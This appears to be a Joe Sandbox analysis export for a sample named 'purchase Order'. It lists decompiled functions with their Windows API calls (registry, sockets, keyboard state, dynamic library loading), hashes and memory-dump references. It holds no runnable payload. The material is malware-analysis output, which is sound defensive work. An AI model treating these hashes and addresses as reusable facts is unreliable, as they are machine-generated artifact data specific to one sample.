nul, xrefs: 00C89600

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c74ca1030f74c24619011d80281a54b228c40a72dd574d212c6d1e155b28ee40
Instruction ID: 096721c160e0d32f5a490578aefe90fa3ff75aa4c4ee322ee7abbb304f61f141
Opcode Fuzzy Hash: c74ca1030f74c24619011d80281a54b228c40a72dd574d212c6d1e155b28ee40
Instruction Fuzzy Hash: 0B214F70600205ABDB21AF65DC05FAE77A4EF85728F244A29F9A1D72E0D770EA40DB14

Function 00C89634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00C89653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C89683
GetStdHandle.KERNEL32(000000F6), ref: 00C89694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C896CE

Strings

nul, xrefs: 00C896C9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a9904313a590503d6261b6a6a99c315f662a000ff9f8a61f69d370418fd52cbc
Instruction ID: d5af84fbf9486f2be2fff480886d5d7b652121377538f0d576937ddba12c0a15
Opcode Fuzzy Hash: a9904313a590503d6261b6a6a99c315f662a000ff9f8a61f69d370418fd52cbc
Instruction Fuzzy Hash: 78215171500205ABDB60AF69DC45FAEB7A8EF85738F280A19F8B1D72D0E7709D41CB58

Function 00C8DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C8DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C8DB5E
__swprintf.LIBCMT ref: 00C8DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,00CDDC00), ref: 00C8DBB5

Strings

%lu, xrefs: 00C8DB71

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: c55ea4c71809de25f241d1319c27dbe402f1d1062c7db7b88672efd5ac14adb0
Instruction ID: 35567640f7bd0ad06f93234d4e297c781a2a3b722de1610eb7417e188b8d8d5b
Opcode Fuzzy Hash: c55ea4c71809de25f241d1319c27dbe402f1d1062c7db7b88672efd5ac14adb0
Instruction Fuzzy Hash: D8218335A00108AFCB10EFA5C985EAEBBB8EF49704B054069F509D7261DB70EE41DB61

Function 00C7C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C7C84A
Part of subcall function 00C7C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7C85D
Part of subcall function 00C7C82D: GetCurrentThreadId.KERNEL32 ref: 00C7C864
Part of subcall function 00C7C82D: AttachThreadInput.USER32(00000000), ref: 00C7C86B

GetFocus.USER32 ref: 00C7CA05

Part of subcall function 00C7C876: GetParent.USER32(?), ref: 00C7C884

GetClassNameW.USER32(?,?,00000100), ref: 00C7CA4E
EnumChildWindows.USER32(?,00C7CAC4), ref: 00C7CA76
__swprintf.LIBCMT ref: 00C7CA90

Strings

%s%d, xrefs: 00C7CA8A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: e80f1725448d7dcaca506f4eaf4a7f1b2aec65248dc8dd358fb58375cfe23616
Instruction ID: 9a991c9d0a1c856f6efaba7b9190ab3108d481771456686e31e5813f28f084e9
Opcode Fuzzy Hash: e80f1725448d7dcaca506f4eaf4a7f1b2aec65248dc8dd358fb58375cfe23616
Instruction Fuzzy Hash: 3F117F7160020A6BCB11BFA09CC5FA93768AF55714F04C07AFE1DAA186DB709A46EB71

Function 00C5D17C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
GetStockObject.GDI32(00000011), ref: 00C5D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8

Strings

@U=u, xrefs: 00C5D1D8

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID: @U=u
API String ID: 3970641297-2594219639
Opcode ID: 884f30a9f8258e91801019064db50520adf3fe93573c7485f4b70fda4330bb73
Instruction ID: d4ad757cd18010a17937574720d51c071e836549d7d3d7182aa84fa80de595a0
Opcode Fuzzy Hash: 884f30a9f8258e91801019064db50520adf3fe93573c7485f4b70fda4330bb73
Instruction Fuzzy Hash: DC118B72101A0ABFEB228F90DC50FEFBB69FF08365F040115FE1692150C7319DA0ABA0

Function 00CA1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CA19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CA1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00CA1B49
CloseHandle.KERNEL32(?), ref: 00CA1BBF

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 182246d42a3832ea2ac363ea56f00d6872bce64901d974cc854cc92427f9432e
Instruction ID: 47e03266a173fcb8857030734846049e8a24f9fdb50d51496184b57f85427e07
Opcode Fuzzy Hash: 182246d42a3832ea2ac363ea56f00d6872bce64901d974cc854cc92427f9432e
Instruction Fuzzy Hash: 6781A4B4600201ABDF109F64C886BAEBBE5EF09724F088459FD15AF3C2D7B4AD41DB94

Function 00C81C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C81CB4
VariantClear.OLEAUT32(00000013), ref: 00C81D26
VariantClear.OLEAUT32(00000000), ref: 00C81D81
VariantClear.OLEAUT32(?), ref: 00C81DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C81E26

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 160b341236dd276a634d3c0cd8e187765f8aeb950765db534494b40fd8df60ae
Instruction ID: a2163beb4010660dd46b9e74b63ed073891bc4db9def5bada820d70480deaf5b
Opcode Fuzzy Hash: 160b341236dd276a634d3c0cd8e187765f8aeb950765db534494b40fd8df60ae
Instruction Fuzzy Hash: 8B512AB5A00209AFDB14DF58C884EAAB7F8FF4C314B15855AED59DB301D730EA52CBA4

Function 00CA0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00CA06EE
GetProcAddress.KERNEL32(00000000,?), ref: 00CA077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00CA079B
GetProcAddress.KERNEL32(00000000,?), ref: 00CA07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 00CA07FB

Part of subcall function 00C5E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00C8A574,?,?,00000000,00000008), ref: 00C5E675
Part of subcall function 00C5E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00C8A574,?,?,00000000,00000008), ref: 00C5E699

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 5dd16ff4cc2c826b32240654f45c45bba74f8cc62efef84687f5ebce851d06eb
Instruction ID: 6eeed51f125cbb2d13a4dbec32aff398bfc826a4d724e8b362fbb49a011ed150
Opcode Fuzzy Hash: 5dd16ff4cc2c826b32240654f45c45bba74f8cc62efef84687f5ebce851d06eb
Instruction Fuzzy Hash: F2514B75A0020ADFCB10EFA8C481EADB7B5FF49354B148059F916AB362DB30EE45DB94

Function 00CA2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CA2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CA2F75
RegCloseKey.ADVAPI32(?,?), ref: 00CA2FA1
RegCloseKey.ADVAPI32(00000000), ref: 00CA2FAE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 2d6de037e8c9b6281e53cd0909059d298bf54e149b985a41b78cfcf610684a72
Instruction ID: 9d6a12059e635b9bda051ceaeade0316a30a4abbd7361563dfe2ab876dbd3b7c
Opcode Fuzzy Hash: 2d6de037e8c9b6281e53cd0909059d298bf54e149b985a41b78cfcf610684a72
Instruction Fuzzy Hash: 6F513971208205AFD704EB98CC91E6AB7F9FF89318F00892DF596972A1DB30E904DB52

Function 00C91206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C912B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C912DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C9131C

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C91341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C91349

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 1344c9b7bd2c31a7c4d47103125e104ee57e09e263ce7f3befc30ba3e36e9851
Instruction ID: b506c5d2c124d7e51904efbe9e8e8928fa2fe0815ba5d64cc6b692be98339fc7
Opcode Fuzzy Hash: 1344c9b7bd2c31a7c4d47103125e104ee57e09e263ce7f3befc30ba3e36e9851
Instruction Fuzzy Hash: B5412D35A00505DFDF01EF64C985AAEBBF5FF09714B148099E90AAB362CB31ED41DB51

Function 00C5B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00C5B64F
ScreenToClient.USER32(00000000,000000FF), ref: 00C5B66C
GetAsyncKeyState.USER32(00000001), ref: 00C5B691
GetAsyncKeyState.USER32(00000002), ref: 00C5B69F

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9717c626e289e3715d9249ca76b7a306560915fef6f9271d0fc31b7d4c5ba7e0
Instruction ID: 70456b616f0bebeabab6912796750133b2924ab040d9981b3a113d45e12d1dd2
Opcode Fuzzy Hash: 9717c626e289e3715d9249ca76b7a306560915fef6f9271d0fc31b7d4c5ba7e0
Instruction Fuzzy Hash: 48417F39508115FFCF199F65C844AEDBBB4FB05325F204319F82A96290DB30AE98EF91

Function 00C7B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C7B369
PostMessageW.USER32(?,00000201,00000001), ref: 00C7B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C7B41B
PostMessageW.USER32(?,00000202,00000000), ref: 00C7B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C7B431

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 3add4b450398e524cc41a677022075f5aafd9186f82a74c0e9d7d39bb0017a03
Instruction ID: 12ac1ce2511c9bbc6b636e6016b5c2a380aac0aeef55666dfcfaac2cfa534827
Opcode Fuzzy Hash: 3add4b450398e524cc41a677022075f5aafd9186f82a74c0e9d7d39bb0017a03
Instruction Fuzzy Hash: 6331AE71900219EFDF04CF68D94DB9E7BB5EB04319F118229F929AA2E1C7B09E54DB90

Function 00C86318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00C450E6: _wcsncpy.LIBCMT ref: 00C450FA

GetFileAttributesW.KERNEL32(?,?,?,?,00C860C3), ref: 00C86369
GetLastError.KERNEL32(?,?,?,00C860C3), ref: 00C86374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C860C3), ref: 00C86388
_wcsrchr.LIBCMT ref: 00C863AA

Part of subcall function 00C86318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00C860C3), ref: 00C863E0

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 3acd456a25abe628c21073122a9c4da8fcaa403bf84d352ecfdc0a9402c22f63
Instruction ID: 3fd4beded376c6c731a3634fc6b5881c588c1cd53999d9310f15789dc9508159
Opcode Fuzzy Hash: 3acd456a25abe628c21073122a9c4da8fcaa403bf84d352ecfdc0a9402c22f63
Instruction Fuzzy Hash: 2821D5315042159BDB25BB78AC46FEE33ACEF06364F100479F456D30E1EB60EA85AB59

Function 00C98B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00C9A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C98BD3
WSAGetLastError.WSOCK32(00000000), ref: 00C98BE2
connect.WSOCK32(00000000,?,00000010), ref: 00C98BFE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 2f580f658e85235a83ee29ebb9a59a94339f4627fd7c06e3c45781b35da4a6bb
Instruction ID: 10e2f8934ddf53de7bc1ec6001108fc0e4e81cb85b402a373687656fb101ebe9
Opcode Fuzzy Hash: 2f580f658e85235a83ee29ebb9a59a94339f4627fd7c06e3c45781b35da4a6bb
Instruction Fuzzy Hash: 0821CA322002149FDB10AF68CC89F7E77A9EF49760F048459FA57AB3D2CB74AD058B65

Function 00C98420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C98441
GetForegroundWindow.USER32 ref: 00C98458
GetDC.USER32(00000000), ref: 00C98494
GetPixel.GDI32(00000000,?,00000003), ref: 00C984A0
ReleaseDC.USER32(00000000,00000003), ref: 00C984DB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 37d3329ce9bf2a2a0d55c648593bc6b9d6bcb18e78cae7b68c72c78087eb782c
Instruction ID: d91256dbc6b6f78075e53993f1467e78f015cfe8e8088b0174dc7978d694b19b
Opcode Fuzzy Hash: 37d3329ce9bf2a2a0d55c648593bc6b9d6bcb18e78cae7b68c72c78087eb782c
Instruction Fuzzy Hash: AB218E75A00204AFDB10EFA4C889BAEBBE5EF49301F048879F85AD7251DB70ED45DB60

Function 00C5AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C5AFE3
SelectObject.GDI32(?,00000000), ref: 00C5AFF2
BeginPath.GDI32(?), ref: 00C5B009
SelectObject.GDI32(?,00000000), ref: 00C5B033

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 94363e03704f78c08f6b9c13803139f49e347fba36ce254e293981dec5b13581
Instruction ID: f99be8cdf619e1bd8b5102bfe1bb26c076b2c71ecd1556384704729fa474eb6f
Opcode Fuzzy Hash: 94363e03704f78c08f6b9c13803139f49e347fba36ce254e293981dec5b13581
Instruction Fuzzy Hash: 342186B8800305EFDB10DF56EC44B9E7BA8BB50366F54432AF829D22E0C3715985DF65

Function 00C6217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00C621A9
CreateThread.KERNEL32(?,?,00C622DF,00000000,?,?), ref: 00C621ED
GetLastError.KERNEL32 ref: 00C621F7
_free.LIBCMT ref: 00C62200
__dosmaperr.LIBCMT ref: 00C6220B

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
